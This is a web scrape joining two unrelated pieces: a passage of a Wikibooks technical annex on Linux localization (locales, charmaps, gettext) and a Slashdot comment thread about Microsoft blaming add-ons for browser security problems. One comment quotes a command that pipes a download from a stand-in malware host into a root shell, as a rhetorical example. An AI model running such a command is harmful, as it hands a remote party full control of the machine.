be called by the client upon key press events. It can determine proper action to the key and return TRUE if it means to intercept the event or FALSE to pass the event back to the client. Some IM (e.g., CJK and European) may do a stateful conversion which is incrementally matching the input string with predefined patterns until each unique pattern is matched before committing the converted string. During the partial matching, the IM emits the "preedit_changed" signal to the client for every change, so that it can update the pre-edit string to the display. Finally, to commit characters, the IM emits the "commit" signal, along with the converted string as the argument, to the IM context. Some IM (e.g., Thai) is context-sensitive. It needs to retrieve text around the cursor to determine the appropriate action. This can be done through the "retrieve_surrounding" signal. In addition, the IM may request to delete some text from the client's input buffer as required by Thai advanced IM. This is also used to correct the illegal sequences. This can be done via the "delete_surrounding" signal. LocalesEdit As mentioned in earlier, the GNU C library is internationalized according to POSIX and ISO/IEC 14652. Both locales are discussed in this section. Locale NamingEdit A locale is described by its language, country and character set. The naming convention as given in OpenI18N guideline [20] is: lang_territory.codeset[@modifiers] where - lang is a two-letter language code defined in ISO 639:1988. Three-letter codes in ISO 639-2 are also allowed in the absence of the two-letter version. The ISO 639-2 Registration Authority at Library of Congress [21] has a complete list of language codes. - territory is a two-letter country code defined in ISO 3166-1:1997. The list of two-letter country codes is available online from ISO 3166 Maintenance agency. [22] - codeset describes the character set used in the locale. - modifiers add more information for the locale by setting options (turn on flags or use equal sign to set values). Options are separated by commas. This part is optional and implementationdependent. Different I18N frameworks provide different options. For example - fr_CA.ISO-8859-1= French language in Canada using ISO-8859-1 character set - th_TH.TIS-620 = Thai language in Thailand using TIS-620 encoding If territory or codeset is omitted, default values are usually resolved by means of locale aliasing. Note that for the GNU/Linux desktop, the modifiers part is not supported yet. Locale modifiers for X Window are to be set through the XMODIFIERS environment instead. Character SetsEdit Character set is part of locale definition. It defines all characters in a character set as well as how they are encoded for information interchange. In the GNU C library (glibc), locales are described in terms of Unicode. A new character set is described as a Unicode subset, with each element associated by a byte string to be encoded in the target character set. For example, the UTF-8 encoding is described like this: ... <U0041> /x41 LATIN CAPITAL LETTER A <U0042> /x42 LATIN CAPITAL LETTER B <U0043> /x43 LATIN CAPITAL LETTER C ... <U0E01> /xe0/xb8/x81 THAI CHARACTER KO KAI <U0E02> /xe0/xb8/x82 THAI CHARACTER KHO KHAI <U0E03> /xe0/xb8/x83 THAI CHARACTER KHO KHUAT ... The first column is the Unicode value. The second is the encoded byte string. And the rest are comments. As another example, TIS-620 encoding for Thai is simple 8-bit single-byte. The first half of the code table is the same as ASCII, and the second half begins encoding the first character at 0xA1. Therefore, the character map looks like: ... <U0041> /x41 LATIN CAPITAL LETTER A <U0042> /x42 LATIN CAPITAL LETTER B <U0043> /x43 LATIN CAPITAL LETTER C ... <U0E01> /xa1 THAI CHARACTER KO KAI <U0E02> /xa2 THAI CHARACTER KHO KHAI <U0E03> /xa3 THAI CHARACTER KHO KHUAT ... POSIX LocalesEdit According to POSIX, standard C library functions are internationalized according to the following categories: Setting LocaleEdit A C application can set current locale with the setlocale() function (declared in <locale.h>). The first argument indicates the category to be set; alternatively, LC_ALL is used to set all categories. The second argument is the locale name to be chosen, or alternatively empty string ("") is used to rely on system environment setting. Therefore, the program initialization of a typical internationalized C program may appear as follows: #include <locale.h> ... const char *prev_locale; prev_locale = setlocale (LC_ALL, ""); and the system environments are looked up to determine the appropriate locale as follows: - If LC_ALL is defined, it shall be used as the locale name. - Otherwise, if corresponding values of LC_CTYPE, LC_COLLATE, LC_MESSAGES are defined, they shall be used as locale names for corresponding categories. - For categories that are still undefined by the above checks, and LANG is defined, this is used as the locale name. - For categories that are still undefined by the above checks, "C" (or "POSIX") locale shall be used. The "C" or "POSIX" locale is a dummy locale in which all behaviours are C defaults (e.g. ASCII sort for LC_COLLATE). LC_CTYPEEdit LC_CTYPE defines character classification for functions declared in <ctype.h>: - iscntl() - isspace() - isalpha() - islower() - toupper() - isgraph() - ispunct() - isdigit() - isupper() - isprint() - isalnum() - isxdigit() - tolower() Since glibc is Unicode-based, and all character sets are defined as Unicode subsets, it makes no sense to redefine character properties in each locale. Typically, the LC_CTYPE category in most locale definitions refers to the default definition (called "i18n"). LC_COLLATEEdit C functions that are affected by LC_COLLATE are strcoll() and strxfrm(). - strcoll() compares two strings in a similar manner as strcmp() but in a locale-dependent way. Note that the behaviour strcmp() never changes under different locales. - strxfrm() translates string into a form that can be compared using the plain strcmp() to get the same result as when directly compared with strcoll(). The LC_COLLATE specification is the most complicated of all locale categories. There is a separate standard for collating Unicode strings, called ISO/IEC 14651 International String Ordering.[23] The glibc default locale definition is based on this standard. Locale developers may consider investigating the Common Tailorable Template (CTT) defined there before beginning their own locale definition. In the CTT, collation is done through multiple passes. Character weights are defined in multiple levels (four levels for ISO/IEC 14651). Some characters can be ignored (by using "IGNORE" as weight) at first passes and be brought into consideration in later passes for finer adjustment. Please see ISO/IEC 14651 document for more details. LC_TIMEEdit LC_TIME allows localization of date/time strings formatted by the strftime() function. Days of week and months can be translated into the locale language, appropriate date. LC_NUMERIC & LC_MONETARYEdit Each culture uses different conventions for writing numbers, namely, the decimal point, the thousand separator and grouping. This is covered by LC_NUMERIC. LC_MONETARY defines currency symbols used in the locale as per ISO 4217, as well as the format in which monetary amounts are written. A single function localeconv() in <locale.h> is defined for retrieving information from both locale categories. Glibc provides an extra function strfmon() in <monetary.h> for formatting monetary amounts as per LC_MONETARY, but this is not standard C function. LC_MESSAGESEdit LC_MESSAGES is mostly used for message translation purposes. The only use in POSIX locale is the description of a yes/no answer for the locale. ISO/IEC 14652Edit The ISO/IEC 14652 Specification method for cultural conventions is basically an extended POSIX locale specification. In addition to the details in each of the six categories, it introduces six more: All of the above categories have already been supported by glibc. C applications can retrieve all locale information using the nl_langinfo() function. Building LocalesEdit To build a locale, a locale definition file describing data for ISO/IEC 14652 locale categories must be prepared. (See the standard document for the file format.) In addition, when defining a new character set, a charmap file must be created for it; this gives every character a symbolic name and describes encoded byte strings. In general, glibc uses UCS symbolic names (<Uxxxx>) in locale definition, for convenience in generating locale data for any charmap. The actual locale data to be used by C programs is in binary form. The locale definition must be compiled with the localedef command, which accepts arguments like this: localedef [-f <charmap>] [-i <input>] <name> For example, to build th_TH locale from locale definition file th_TH using TIS-620 charmap: # localedef -f TIS-620 -i th_TH th_TH The charmap file may be installed at /usr/share/i18n/charmaps directory, and the locale definition file at /usr/share/i18n/locales directory, for further reference. The locale command can be used with "-a" option to check for all installed locales and "-m option to list supported charmaps. Issuing the command without argument shows the locale categories selected by environment setting. TranslationEdit The translation framework most commonly used in FOSS is GNU gettext, although some cross-platform FOSS, such as AbiWord, Mozilla and OpenOffice.org use their own frameworks as a result of the crossplatform abstractions. In this section, the GNU gettext, which covers more than 90 percent of GNU/Linux desktops, is discussed briefly. The concepts discussed here, however, apply to other frameworks. Messages in program source code are put in a short macro that calls a gettext function to retrieve the translated version. At program initialization, the hashed message database corresponding to LC_MESSAGES locale category is loaded. Then, all messages covered by the macros are translated by quick lookup during program execution. Therefore, the task of translation is to build the message translation database for a particular language and get it installed in an appropriate place for the locale. With that preparation, the gettext programs are automatically translated as per locale setting without having to touch the source code. GNU gettext also provides tools for creating the message database. Two kinds of files are involved in the process: - PO (Portability Object) file. - This is a file in human-readable form for the translators to work with. It is named so because of its plain-text nature, which makes it portable to other platforms. - MO (Machine Object) file. - This is a hashed database for machines to read. It is in the final format to be loaded by the gettext program. There are many translation frameworks in commercial Unices, and these MO files are not compatible. One may also find some GMO files as immediate output from GNU gettext tools. They are MO files containing some GNU gettext enhanced features. Important GNU gettext tools will be discussed by describing the summarized steps of translation from scratch (See Figure 3): - Extract messages with the xgettext utility. What you get is the " package.pot" file as a template for the PO file. - Create the PO file for your language from the template, either by copying it to "xx.po" (where xx is your locale language) and filling its header information with your information, or by using the msginit utility. - Translate the messages by editing the PO file with your favourite text editor. Some specialized editors for PO files, such as kbabel and gtranslator, are also available. - Convert the PO file into MO file using the msgfmt utility. - Install the MO file under the LC_MESSAGES directory of your locale. - When the program develops, new strings are introduced. You need not begin from scratch again. Rather, you extract the new PO template with the xgettext utility as usual, and then merge the template with your current PO with the msgmerge utility. Then, you can continue by translating the new messages. GNOME intltoolEdit GNU/Linux desktops have more things to translate than messages in C/C++ source code. The system menu entries, lists of sounds on events, for example, also contain messages, mostly in XML formats that are not supported by GNU gettext. One may dig into these individual files to translate the messages, but this is very inconvenient to maintain and is also error prone. KDE has a strong policy for translation. PO files for all KDE core applications are extracted into a single directory for each language, so that translators can work in a single place to translate the desktop without a copy of the source code. But in practice, one needs to look into the sources occasionally to verify the exact meaning of some messages, especially error messages. This already includes all the messages outside the C++ sources mentioned above. GNOME comes up with a different approach. The PO files are still placed in the source under the "po" subdirectory as usual. But instead of directly using xgettext to extract messages from the source, the GNOME project has developed an automatic tool called intltool. This tool extracts messages from the XML files into the PO template along with the usual things xgettext does, and merges the translations back as well. As a result, despite the heterogeneous translation system, what translators need to do is still edit a single PO file for a particular language. The use of intltool is easy. To generate a PO template, change the directory to the " po" subdirectory and run: $ intltool-update --pot To generate a new PO file and merge with existing translation: $ intltool-update xx where xx is the language code. That is all that is required. Editing the PO file as usual can then begin. When PO editing is complete, the usual installation process of typical GNOME sources will automatically call the appropriate intltool command to merge the translations back into those XML files before installing. Note that, with this automated system, one should not directly call the xgettext and msgmerge commands any more. The following sites and documents provide more information on KDE and GNOME translation: - KDE Internationalization Home ( ) - The KDE Translation HOWTO ( ) - The GNOME Translation Project ( ) - Localizing GNOME Applications ( ) - How to Use GNOME CVS as a Translator ( ) PO EditorsEdit A PO file is a plain text file. This can be edited, using a favourite text editor. But, as stated earlier, translation is a labour-intensive task. It is worth considering some convenient tools to speed up the job. Normally, the editor is needed to be able to edit UTF-8, as both KDE and GNOME now have used it as standard text encoding. However, the following tools have many other features. KBabelEdit Part of the KDE Software Development Kit, KBabel is an advanced and easy-to-use PO-files editor with full navigation and editing capabilities, syntax checking and statistics. The editor separates translated, un-translated and fuzzy messages so that it is easy to find and edit the unfinished parts. KBabel also provides CatalogManager, which allows keeping track of many PO-files at once, and KBabelDict for keeping the glossary, which is important for translation consistency, especially among team members from different backgrounds. GtranslatorEdit Gtranslator is the PO-file editor for the GNOME desktop. It is very similar to Kbabel in core functionality. Gtranslator also supports auto-translation, where translations are learnt and transferred into its memory, and can be applied in later translations using a hot key. FootnotesEdit - ↑ UCS is the acronym for Universal multi-octet coded Character Set - ↑ UTF is the acronym for Unicode (UCS) Transformation Format - ↑ The Unicode Consortium. The Unicode Standard, Version 4.0., pp. 76-77. - ↑ The Unicode Consortium. The Unicode Standard, Version 4.0., pp. 77-78. - ↑ Ibid., pp. 95-104. - ↑ Unicode.org, 'Unicode Technical Reports'; available from . - ↑ Unicode.org, 'Unicode Technical Reports'; available from . - ↑ Leisher, M., 'The XmBDFEd Font Editor'; available from crl.nmsu.edu/~mleisher/xmbdfed.html - ↑ Williams, G., ' PfaEdit'; available from . - ↑ Just van Rossum, J., S ' TTX/FontTools'; available from . - ↑ Note the difference with Microsoft's " Windows" trademark. X Window is without 's'. - ↑ Taylor, O., 'Pango'; available from . - ↑ Taylor, O., 'Pango - Design'; available from . - ↑ GNOME Development Site, 'Pango Reference Manual'; available from . - ↑ This is a very rough classification. Obviously, there are further steps, such as line breaking, alignment and justification. They need not be discussed here, as they go beyond localization. - ↑ Pascal, I., X Keyboard Extension; available from . - ↑ Pascal, I., X Keyboard Extension; available from - ↑ Gettys, J., Scheifler, R.W., Xlib-C Language X Interface, X Consortium Standard, X Verision 11 Release 6.4. - ↑ Narita, M., Hiura, H., The Input Method Protocol Version 1.0. X Consortium Standard, X Version 11 Release 6.4. - ↑ OpenI18N.org. OpenI18N Locale Name Guideline, Version 1.1 - 2003-03-11; available from - ↑ Library of Congress, ISO 639-2 Registration Authority; available from. - ↑ ISO, ISO 3166 Maintenance agency (ISO 3166/MA) - ISO's focal point for country codes; available from. - ↑ ISO/IEC 14651 International String Ordering. ISO/IEC, ISO/IEC JTC1/SC22/WG20 - Internationalization; available from .
http://en.m.wikibooks.org/wiki/FOSS_Localization/Annex_B:_Technical_Aspects
CC-MAIN-2014-15
refinedweb
7,006
55.54
Analyse Package Archive (REST API) This tutorial complements the REST API section, and the aim here is to show the API features while analyzing a package archive. Tip As a perquisite, check our REST API chapter for more details on REST API and how to get started. Instructions: First, let’s create a new project called boolean.py-3.8. We’ll be using this package as the project input. We can add and execute the scan_package pipeline on our new project. Note Whether you follow this tutorial and previous instructions using cURL or Python script, the final results should be the same. Using cURL In your terminal, insert the following: api_url="" content_type="Content-Type: application/json" data='{ "name": "boolean.py-3.8", "input_urls": "", "pipeline": "scan_package", "execute_now": true }' curl -X POST "$api_url" -H "$content_type" -d "$data" Note You have to set the api_url to if you run on a local development setup. Tip You can provide the data using a json file with the text below, which will be passed in the -d parameter of the curl request: { "name": "boolean.py-3.8", "input_urls": "", "pipeline": "scan_package", "execute_now": true } While in the same directory as your JSON file, here called boolean.py-3.8_cURL.json, create your new project with the following curl request: curl -X POST "" -H "Content-Type: application/json" -d @boolean.py-3.8_cURL.json If the new project has been successfully created, the response should include the project’s details URL value among the returned data. { "name": "boolean.py-3.8", "url": "", "[...]": "[...]" } If you click on the project url, you’ll be directed to the new project’s instance page that allows you to perform extra actions on the project including deleting it. Using Python script Tip To interact with REST APIs, we will be turning to the requests library. To follow the above instructions and create a new project, start up the Python interpreter by typing pythonin your terminal. If you are seeing the prompt >>>, you can execute the following commands: import requests api_url = "" data = { "name": "boolean.py-3.8", "input_urls": "", "pipeline": "scan_package", "execute_now": True, } response = requests.post(api_url, data=data) response.json() The JSON response includes a generated UUID for the new project. # print(response.json()) { "name": "boolean.py-3.8", "url": "", "[...]": "[...]", } Note Alternatively, you can create a Python script with the above commands/text. Then, navigate to the same directory as your Python file and run the script to create your new project. However, no response will be shown on the terminal, and to access a given project details, you need to visit the projects’ API endpoint.
https://scancodeio.readthedocs.io/en/latest/tutorial_api_analyze_package_archive.html
CC-MAIN-2022-27
refinedweb
433
62.68
Microsoft Blames Add-Ons For Browser Woes 307 darthcamaro writes "Running IE and been hacked? Don't blame Microsoft — at least that's what their security types are now arguing. 'One of the things we've seen in the last two years is that attackers aren't even going after the browser itself anymore,' Eric Lawrence, Security Program Manager on Microsoft's Internet Explorer team, said. 'The browser is becoming a harder target and there are many more browsers. So attackers are targeting add-ons.' This kinda makes sense since whether you're running IE, Firefox, Safari or Chrome you could still be at risk if there is a vulnerability in Flash, PDF, QuickTime or another popular add-on. Or does it?" Duh (Score:5, Insightful) Did anyone seriously believe Microsoft wouldn't try to make Internet Explorer look at least "not as bad as they say"? !news I'll still blame you for everything else. (Score:5, Insightful) Re:I'll still blame you for everything else. (Score:5, Informative) Re:I'll still blame you for everything else. (Score:5, Funny) That would be an add-on problem. Re: (Score:2, Interesting) Re: (Score:2, Insightful) To be fair to Microsoft (And a disclaimer, I primarily use Opera myself): -I don't find the interface any more or less intuitive than FF3 or Opera. I am used to Opera, so I know it better. I've never really had to hunt for an option in any of them...everything is all generally in a logical spot. -IE7 is definately a standard-ignoring bastard. And assuming you're an FF advocate, remember it didnt pass Acid2 until FF3. And IE8 is shipping in a standard-complaint mode by default, which should help all browse Re:I'll still blame you for everything else. (Score:5, Funny) (Yes, I know I am going to get voted down for attempting to defend IE in any capacity...they should really just add -1 Disagree and be done with it) Much more needed is "-1, Reverse psychology" (runner-up is "+1, your uid is prime") Re:I'll still blame you for everything else. (Score:5, Informative) IE7 is definately a standard-ignoring bastard. And assuming you're an FF advocate, remember it didnt pass Acid2 until FF3. And IE8 is shipping in a standard-complaint mode by default, which should help all browsers out. Complaining that Firefox didn't pass Acid2 until v3 doesn't make a lot of sense if you understand why the test was made. No browsers adhere to all standards 100%, but all the browsers except IE do a fairly decent job of rendering pages the way they're supposed to. So when Acid2 was created, the idea (AFAIK) was to put together a complex rendering that would expose a selection of bugs that would cause every major browser to fail it. It was supposed to be a sort of test that said, "even if your browser is doing a pretty good job, here are some places where it might fall apart." So it's not supposed to be the end-all be-all test of standards compliance. You can pass the Acid2 test but still not render normal pages properly, or you could generally do a good job rendering pages but fail the test. The fact that it took Firefox some time to pass isn't an indication that it took them a long time to figure it out, but rather that they fixed in in their new rendering engine and took a while to put that rendering engine into their release version of the browser. There wasn't much reason to rush because it wasn't terribly urgent. But the question is still whether the browser will generally render pages according to the HTML and CSS standards. Most browsers do far better than IE. As for "standard-compliant mode", I still wonder how standard-compliant it will be. Right now, if I make a page, I generally have to design it to the standards, which will make it run in most browsers, and then figure out how to make it display properly in IE. If IE8 makes it so I don't have to do that anymore, a lot of my complaints will go away. Re: (Score:3, Informative) Definitely. Definitely! The Acid tests are not an indicator of standards compliance. They're tests of flaws in web browsers that web developers want fixed. KHTML may have passed Acid2 first, but it had a lot of rendering flaws. When Gecko didn't pass Acid2, it had less flaws and was more standards compliant overall. Re:I'll still blame you for everything else. (Score:4, Funny) definately Definitely. Definitely! People are going to write they way the write irregardless of your protests. You should of just, like, totally ignored him. Permissions (Score:5, Insightful) Re:Permissions (Score:5, Interesting) Re:Permissions (Score:5, Informative) Konqueror runs flash elements and java applets in a separate process with low privileges and high niceness. When flash crashes, it does so by itself. Re: (Score:2, Informative) What about kde-gnash? (Score:5, Informative) There are many sites that bring the whole system nearly to a halt when konqueror loads the page. Looking into the CPU usage with top shows that 99% of the CPU time is being used by kde-gnash. Doing a "killall kde-gnash" brings everything back to normal, with a grey square where the flash was. You are right that konqueror does not crash the whole computer, but that's still very far from the desired result. Re: (Score:2) Except when it doesn't. Re:Permissions (Score:5, Insightful) Just in case anyone was going to interpret this literally: Ideally, most of these plugins should be setuid as nobody No, no, a thousand times no! I suppose "nobody" was a clever concept, whenever it was invented. After all, with only one or two daemons using it, and with so few permissions, that was a reasonably smart move. These days, nobody is anything but -- since all the more lazily-developed (or lazily-admined) apps just use nobody for their unprivileged user, that means one app's nobody process can easily screw with another app's nobody process. The right solution would be to either run all plugins in some sort of completely managed, protected VM -- kind of like we do for Javascript -- or create a new Unix user per plugin. In fact, checking on my system, user ids are four bytes. That is, over four billion possible user ids. Granted, /etc/passwd is woefully ill-equipped to handle that many users -- but given a system which could, there's no reason I know of not to create a new Unix user per currently-visible object tag. But at the very least, I beg you, create a flash-plugin user, and a java-plugin user, etc. Please, please don't just use nobody. It's like people who programmatically look for a tag called 'foo:bar', instead of bothering to learn how XML namespaces actually work -- you're so close to understanding it, don't stop now! Re:Permissions (Score:5, Insightful) I second that! Somewhere along the line add-ons got way to much permissions. Why on earth does Adobe Flash have access to my webcam and harddrive?!? Re: (Score:3, Informative) Somewhere along the line add-ons got way to much permissions. Why on earth does Adobe Flash have access to my webcam and harddrive?!? Was there a time when plug-ins couldn't have access to the harddrive? Re: (Score:3, Insightful) Why do Mac users and Linux users manage to avoid most of this shit? I think there are two reasons 1: there is simply less shit availible for thier platform 2: mac and linux users tend to be more experianced and discerning. Nearly all newbies use windows? Re:Permissions (Score:5, Interesting) Re: (Score:2) Re:Permissions (Score:5, Insightful) Well very few if any apps say they require root access unless they of course genuinely NEED root access, not even to install them. Whereas trying to use windows outside of very carefully controlled office and school enviroments without Administrator access is impossible.? Should it even be possible for add-ons to do this? Should we really expect the average user to understand that allowing the add-ons to turn off sandbox mode isn't a good idea? At the very least, if an add-on wishes to turn off sandbox mode, a stern but CLEAR warning should be given to the user, and they should have to supply an administrator password. Of course, since vista bugs users for permission so much, most users would just click through the warning thoughtlessly. I bought my mother a Mac. When she used to use a PC, she would always get caught by trojans. Now I just tell her to never enter her admin password unless performing updates. Problem solved. Because OS X rarely asks for an admin password, when it does, users know that the program wants to do something serious. Re: (Score:3, Interesting) What everyday task does Vista bug you about authorizing? I've heard this a number of times how it nags people and that the initial release was rough but since SP1 I only see allow or deny when its something I'm doing intentionally that administrative related like installing an update to a program. I'm genuinely interested in this since I manage a lot of Windows machines and sooner or later I'll have to deal with common complaints or face turning UAC off. Re:Permissions (Score:4, Interesting) Are you sure? Are you really sure? Positive? Ok Re:Permissions (Score:4, Informative) right because your typical business users would never say want to change the extention of some think like report.txt they get mailed to them from a host system to something like report.csv so they can open it in Excel. Stuff like the never happens.... Re: (Score:3, Informative) I typical business user isn't ging to be storing "report.txt" in a protected system path. They are going to save it in My Documents or a subfolder, the default location presented by Vista. Re: (Score:2) If Microsoft puts out an OS which allows people to write third party software for it, don't they have some obligation to make sure their OS can't be compromised by third parties? Re: (Score:2) They would be one of very few operating systems if that were the case. ATI drivers here on Ubuntu cause lock-ups all the time, sometimes I can't even ctrl+alt+backspace to restart X. In short, people are idiots and it is up to developer and administrators to do their jobs properly. All the issues out there are as results of lazy programmers or administrators or both. Re:Permissions (Score:4, Insightful) IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result. Browser A: "would you like to give this plugin root access to your computer?" (note: if you click 'no' then you will be unable to watch the video you requested) Browser B: (plays the video, having done sufficient programming to ensure that it's safe, allows the video player to run with minimum permissions) Re:Permissions (Score:5, Interesting) can they really be blamed for shoddy coding done by third parties? Yes they can and here is why: If a program is going to allow addons then the communications between the addons and the main application should be conducted entirely through interfaces [microsoft.com] in order to preserve abstraction and enforce Design by Contract [wikipedia.org] principles. In this way addons are allowed to plug into the application at precise locations controlled by the main application and to interact with the main application abstractly and in precisely defined and limited ways. Some people might argue that this is too limiting, but it has been my experience in developing software in this style that well designed interface contracts can support a wealth of valuable features while maintaining plug-ability and abstraction throughout the software stack. So I don't buy "It's the addons fault" since the addons, ultimately, can only do things which the main application framework has allowed them to do whether intentionally, through good abstraction, or unintentionally from poor addon framework design. Re: (Score:3, Informative) >IE7 is set to run in sandbox mode by default. I believe this is only on Vista. Re: (Score:2) Microsoft creates the environment in which these add-ons run. If that environment is too permissive, allowing add-ons to reach deep into your system, then this is still microsoft's fault. They should only allow the add-ons to play in a very small sandbox with high walls. I've always said this. (Score:5, Insightful) The biggest part of internet security is paying attention to where you go. I used IE from the day I started using the internet until the day Chrome was released, and in those years, I got a virus/spyware exactly once: by stupidly going to a keygen site my friend suggested, which was full of malware. The rest of the time, I was fine. This isn't to say that the technology side should be ignored, but if people actually used their damn heads on the internet, it wouldn't matter much at all which browser they used. Re: (Score:3, Informative) I could make some analogy with sex and condoms, but I don't have the energy. So I'll just put it simply: technical problem -> technical solution. No excuses. Re: (Score:3, Insightful) How about a car analogy? If you don't drive your car into downtown Liberty City, San Andreas, Vice City etc. you aren't as likely to get car jacked, even if you leave the top down and the doors unlocked. Same with a browser. If you aren't going to places that are suspect, you won't be as likely to get malware. Layne Re:I've always said this. (Score:5, Informative) This is bull. I'll make an analogy for you with sex and condoms, since you suggested it, and it is a fairly apt analogy. Using the internet with a secure browser is like having sex with a condom. Using it with an insecure browser is like having sex without a condom. But in the end, condoms or no condoms, if you have sex with a person you know is carrying every kind of STD known to man (or is likely to be), you're the fool. And whether or not you use condoms, the best defense is being smart about your partners. Of course you should use condoms, that's just prudence. But the first line of defense is knowing who you're having sex with. And you'll note I said that the technical side of the issue shouldn't be ignored. The fact remains, though, that the most effective thing we can do is user training. This is too fun (Score:5, Funny) I like the sex analogies; I think this should be a new standard for /. Yours has some good points but: Surfing the web with IE is like if you were to go to a convenience store to buy eggs and discovered that you had to have sex with the mysterious man behind the counter in order to accomplish this task. Sure, you can be safe about it: wear condoms, only go to reputable convenience stores with clean-looking men behind the counter, etc. But isn't part of you wondering why you have to open yourself up in this way? Re: (Score:3, Funny) >>I like the sex analogies; I think this should be a new standard for /. Nonstarter. Reader-base is unfamiliar with the interface. Back to car analogies please. --Bargeld Re: (Score:2) With automated botnets scanning and attacking your legitimate sites are getting exploited Large scale sql insertion attack [computerworld.com]. You could use something like siteadvisor.com [siteadvisor.com] to help protect yourself, if you aren't afraid of using something owned by McAfee. It doesn't catch exploited sites instantaneously, but it helps you on the user training front by marking large swatch of the internet as unsafe. It Re: (Score:2) Actually, it's more like a stack of one-dollar bills the size of a football field inside the Library of Congress in the shape of a car. Re: (Score:2) Re: (Score:3, Funny) Re: (Score:2) I agree completely. My antivirus program says everything is fine, and so does my spyware killer. The only thing I can't quite figure out is that since I started on-line banking, it doesn't matter how much money I put in my account, the balance won't go above $5,000. :) Re: (Score:2) ... and in those years, I got a virus/spyware exactly once: by stupidly going to a keygen site my friend suggested, which was full of malware. The rest of the time, I was fine. How do you know? Re: (Score:2) Welcome to the internet, I'll show you around. Re: (Score:2) Re:I've always said this. (Score:5, Insightful) I would agree with you, if "going" to a malware site meant curl [malwaresite.com] | sudo bash Normally, that isn't the case, and "going" somewhere poses virtually no risk at all. There's one big exception, and the exception is so big and has so much marketshare, that people confuse that with normality. "Going to" a site or "opening" an email, doesn't mean "run someone else's code, and make sure to give it the same level of access that I have with a screwdriver." Re: (Score:2, Insightful) I think your theory works for preventing the majority of issues, but it doesn't solve the problem. Just because you're careful, all it takes is one click to the wrong site, whether it be from a link in a forum, a search result, or clicking a known good server that has been owned, and you're infected. The problem is that the security of the browser should prevent somone from taking over your machine. You can avoid walking down dark alleys at night, and you significantly cut down on your chances of getting Re: (Score:2) Re: (Score:2) Meh - I go to all kinds of dodgy sites, and have yet to have a virus. Obviously I get a few warnings, Firefox warns me about some stuff, and I never ever actually run anything from a source I don't trust. My personal opinion is that most people get viruses from emails their friends have sent them, which they click yes to. Vista's UAC is actually pretty useful for me. It rarely pops up when I'm doing normal stuff, and it does stop stuff from running as admin. I used to have antivirus on this box, but I Re: (Score:2) All men have two heads, but they can only think with one of them at a time. Now, if you're indulging in some "one-handed browsing," how secure your browser is may well be a factor in keeping your computer clean because sites like that are prime grazing ground for malware and trojans and spyware, Oh my! Re: (Score:2) You are assuming that valid sites you visit haven't been compromised so that they install malware, or that your upstream DNS didn't get hijacked. If your browser isn't secure eventually you will end up with problems no matter what sort of sites you visit. This particular article is just Microsoft trying to side-step the fact that something as simple as switching your browser from IE to something else can reduce your risk substantially. But remember (Score:5, Insightful) If it's Firefox, it's perfectly OK to blame the add-ons. Those hundreds of memory leaks the FF team fixed in 3.0? All attributed to add-ons, until they were fixed. And don't get me wrong, FF is a far superior browser to IE any day of the week, but people in crystal rooms shouldn't be hurling stones at others. Or something along those lines. Re: (Score:2, Insightful) I think the point has always been that it was easier to fix those leaks in the add-ons than to implement draconian quotas on add-ons in the browser. They were able to fix it to some degree, but all it's doing is preventing poorly-written addons from leaking memory. I think protecting the user from his addons is a superior technical solution, but it isn't Firefox's "fault" that the addons were written poorly. And I would in fact apply the same argument to IE and extend it to Windows: plugins to IE causing pro Re: (Score:2) "This [letmegoogl...foryou.com] page will make it crash every single time on this machine, for example." Using 3.1b1 and nothing strange happens. Add-ons: Adblock plus, Noscript(off), fasterfox Re: (Score:2) It didn't crash, and I'm definitely keeping that link! :) Re: (Score:2) 3.0.4 here, Adblock Plus, Foxmarks, FoxyProxy and User Agent Switcher plugins, and that site works fine. You have something screwed up on your machine. It's the Network! (Score:2) Around here, and many other places, I suspect, the generally-accepted practice is to first blame the network when problems arise. The network usually isn't at fault but we are still forced to jump through hoops before we can tell the user the network is fine, it's their poorly-implemented config/script/filter that caused their problems. I see this as a similar practice... if some crap comes through the browser, it must be the browser's fault. Nevermind that some toolbar or plugin or other enhacement left a Re: (Score:2) Love it when users try to blame their flaky network connections for files getting deleted. They certainly didn't delete the wrong file, their network connection is glitchy and "goes down" all the time, they tell me on their IP phone.... Re: (Score:2) I thought the generally accepted practice for MS is to first blame the video driver, and then blame the printer driver. *then* they might look at the problem :) Mind you, I agree with MS here, the biggest problem with the browser is the add-ins.. ones like SmileyCentral, AdsULike, PhishingToolbar, AntiVirusCheckPro, and NoSpamHonestNoReally. Bullshit. Plain utter bullshit. (Score:5, Insightful) Many non-power-users don't use addons at all. If what was being said were true, only us techies would be affected. ...and if that were true no one would care (including us techies) because we know how to protect ourselves. Re:Bullshit. Plain utter bullshit. (Score:4, Insightful) Many non-power-users don't use addons at all. And there are plenty more who install the Yahoo and Google toolbars, plus whatever other crap comes up. Re: (Score:3, Informative) Yes, I'm still trying to figure out how to teach my Mom that she doesn't need EVERY toolbar in existence. Re: (Score:3, Informative) And there are plenty more who install the Yahoo and Google toolbars, plus whatever other crap comes up. To be fair, those often get loaded by accident - as part of installing adobe reader, or java, or skype, or whatever, and of course its defaulted to install, so unless you read every page of the installation wizard, they get you. Re: (Score:2) What absence? [softpedia.com] Re:Bullshit. Plain utter bullshit. (Score:5, Insightful) Really? I don't think I've ever loaded up IE on a non-"power user" person's computer without seeing at least 2 or 3 "search toolbar" addons installed. If anything, I think "power users" are less likely to have random addons installed since they actually bother to uncheck the "install random crap toolbar" box when they install something. Re: (Score:2) yeah, bullshit is right- bullshit power users don't use add-ons; look at the examples given in the article and the summary- flash, pdf, and quicktime? unless you categorize all the youtube users as 'techies', eh? Re: (Score:2) I'm going to remember that next time I have to fix someone's computer and IE has 10 bullshit toolbars, of which 9 of them are malware. Re: (Score:2) From TFA: The browser is becoming a harder target and there are many more browsers," Lawrence said. "So attackers are targeting add-onsaling from the poor to give to the rich. But your IE add-on worn't work in Firefox and the Firefox add-on won't work on Opera. How stupid do these people think we are? He added that attackers are finding add-ons with high market share looking for vulnerabilities and then exploiting every browser through the add-on Again, that's neither logical nor reasonable. Can anyone point t Re: (Score:3, Interesting) Can anyone point to an add-on that has more users than ANY brand of browser? Sun Java? Adobe Flash? Not sure about the former does, but the latter has a much bigger installed-base than IE. Re: (Score:2, Informative) Many non-power-users don't use addons at all. That's incorrect. Most of them install the add-ons without really knowing that they are doing, or don't unchecked the box that says "Install this tool bar you don't want" when installing software. Re: (Score:2) Many non-power-users don't use addons at all. Everybody (well, almost of course) has flash installed nowadays. Re: (Score:2) I'm a power user, and I use add-ons ... Especially noscript. It's really helpful on IE... No wait ... Nevermind on the IE part. I haven't used wine to load IE yet. Re: (Score:2) Did you miss the 